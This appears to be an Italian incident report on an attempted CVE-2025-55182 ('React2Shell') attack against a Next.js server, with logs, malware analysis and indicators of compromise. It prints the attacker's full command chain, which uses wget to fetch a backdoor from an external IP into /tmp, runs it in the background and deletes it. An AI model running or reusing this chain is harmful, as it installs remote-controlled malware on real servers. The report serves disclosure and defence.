
Analisi di attacchi reali di CVE-2025-55182 (React2Shell) - Vulnerabilità RCE nei React Server Components
Analisi di un attacco reale su un'applicazione Next.js in produzione
Il 5 dicembre 2025, la nostra applicazione Next.js in produzione è stata presa di mira da aggressori che sfruttavano CVE-2025-55182 (React2Shell), una vulnerabilità critica di Remote Code Execution nei React Server Components. L'attacco ha tentato di scaricare ed eseguire un trojan backdoor Linux sul nostro server.
| Attributo | Valore |
|---|---|
| ID CVE | CVE-2025-55182 |
| Punteggio CVSS | 9.8 (Critico) |
| Data dell'Attacco | 5 dicembre 2025 |
| Esito dell'Attacco | ✅ Bloccato (post-patch) |
| Tipo di Malware | Trojan Backdoor Linux |
| Stack Coinvolto | Next.js + React Server Components |
CVE-2025-55182, nota anche come "React2Shell", è una vulnerabilità critica di Remote Code Execution (RCE) che colpisce i React Server Components (RSC) in:
La vulnerabilità risiede nella funzione renderToReadableStream() all'interno del Flight Server di React. Quando elabora payload RSC appositamente predisposti, il server non riesce a sanificare correttamente determinati input, portando all'esecuzione arbitraria di codice.
Attaccante → Payload RSC malevolo → Flight Server → eval() → RCE
L'attaccante invia una richiesta POST costruita con un payload serializzato malevolo che viene deserializzato ed eseguito sul server.
| Timestamp (UTC) | Evento |
|---|---|
| 5 dic, 06:20 | Primo attacco rilevato tramite Sentry |
| 5 dic, 06:20 | Il payload tenta di eseguire comandi shell |
| 5 dic, 06:20 | Attacco parzialmente riuscito (pre-patch) |
Log Errore Sentry (Pre-Patch):
Error: root
at eval (eval at <anonymous>, <anonymous>:3:6)
at nk (chunk.js)
at JSON.parse (<anonymous>)
at n5 (/app/node_modules/next/dist/server/app-render.js)
| Timestamp | Azione |
|---|---|
| 4 dic, 14:13 | Aggiornato a Next.js 16.0.7 |
| 4 dic, 14:13 | Distribuita versione con patch (v1.0.0-beta-4) |
| Timestamp (UTC) | Evento |
|---|---|
| 5 dic, 08:48 | Tentativo di attacco rilevato |
| 5 dic, 08:48 | Esecuzione del payload BLOCCATA |
| 5 dic, 08:48 | Errore: syntax error: unexpected ";" |
Log Errore Sentry (Post-Patch):
Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ;
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"
La patch ha impedito con successo l'esecuzione del comando malevolo.
| Attributo | Valore |
|---|---|
| URL di Destinazione | https://[REDATTO]/ |
| Metodo | POST |
| User-Agent | Python Requests 2.31 |
| Origine | Script di attacco automatizzato |
L'attaccante ha tentato di eseguire la seguente catena di comandi:
wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim
Scomposizione:
| Passo | Comando | Scopo |
|---|---|---|
| 1 | wget http://45.76.155.14/vim -O /tmp/vim | Scaricare il malware |
| 2 | chmod +x /tmp/vim | Renderlo eseguibile |
| 3 | nohup /tmp/vim > /dev/null 2>&1 & | Eseguire in background, persistenza dopo il logout |
| 4 | rm -f /tmp/vim | Eliminare le prove |
| Componente | Versione |
|---|---|
| SO | Alpine Linux 3.23.0 |
| Runtime | Node.js v20.19.6 |
| Framework | Next.js 16.0.7 (con patch) |
| Contenitore | Docker |
| Attributo | Valore |
|---|---|
| Nome File | vim (mascherato da strumento legittimo) |
| SHA256 | 0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce |
| Tipo File | ELF 64-bit LSB eseguibile, x86-64 |
| Linguaggio | Go (binario compilato) |
| Dimensione File | ~4.7 MB |
Tasso di Rilevamento: 13/72 (18%)
| Vendor | Nome Rilevamento |
|---|---|
| DrWeb | Linux.BackDoor.Siggen.389 |
| AhnLab-V3 | Backdoor/Linux.Agent.4780032 |
| Kaspersky | HEUR:Trojan.Linux.Agent.gen |
| ESET-NOD32 | Linux/Agent.PX Trojan |
| Avast/AVG | ELF:Agent-BQE [Trj] |
| AliCloud | Trojan:Linux/Agent.ff565f70 |
| Antiy-AVL | Trojan/Linux.Agent.px |
| Rising | Trojan.Agent/Linux!8.13268 |
| SentinelOne | Static AI - Suspicious ELF |
| Tencent | Malware.Linux.Generic.1c03c8b9 |
| Zillya | Trojan.Agent.Linux.5292 |
Link VirusTotal: Visualizza Analisi
Intestazione ELF:
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000 ..>.....`.E.....
Capacità Identificate:
| Capacità | Evidenza |
|---|---|
| Client HTTP/HTTPS | net/http, *http.Client |
| Crittografia TLS | crypto/tls, crypto/aes |
| Proxy SOCKS5 | socks, socks5 |
| Risoluzione DNS | net/dns/dnsmessage |
| Crittografia Forte | chacha20poly1305, Ed25519 |
Stringhe Estratte (Rilevanti):
crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack
| Severità | Regola | Fonte |
|---|---|---|
| BASSA | ET POLICY HTTP traffic on port 443 (POST) | Proofpoint ET Open |
| BASSA | ET DNS Query for .cc TLD | Proofpoint ET Open |
Tipo: Trojan Backdoor Linux
Capacità:
| Tipo | Valore | Descrizione |
|---|---|---|
| Indirizzo IP | 45.76.155.14 | Server di distribuzione malware |
| URL | http://45.76.155.14/vim | URL di download malware |
| Hosting | Vultr VPS | Provider cloud |
| TLD | .cc | Dominio C2 utilizza TLD .cc |
| Tipo | Valore |
|---|---|
| SHA256 | 0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce |
| SHA1 | [Calcolare se necessario] |
| MD5 | [Calcolare se necessario] |
| Nome File | vim (mascherato) |
| Tipo File | ELF 64-bit x86-64 |
| Dimensione File | ~4.7 MB |
| Indicatore | Descrizione |
|---|---|
wget verso IP esterno | Download da URL non standard |
File in /tmp/ | Eseguibile sospetto nella directory temporanea |
nohup + esecuzione in background | Tentativo di persistenza |
| Cancellazione immediata del file | Pulizia delle prove |
| User-Agent Python Requests | Strumento di attacco automatizzato |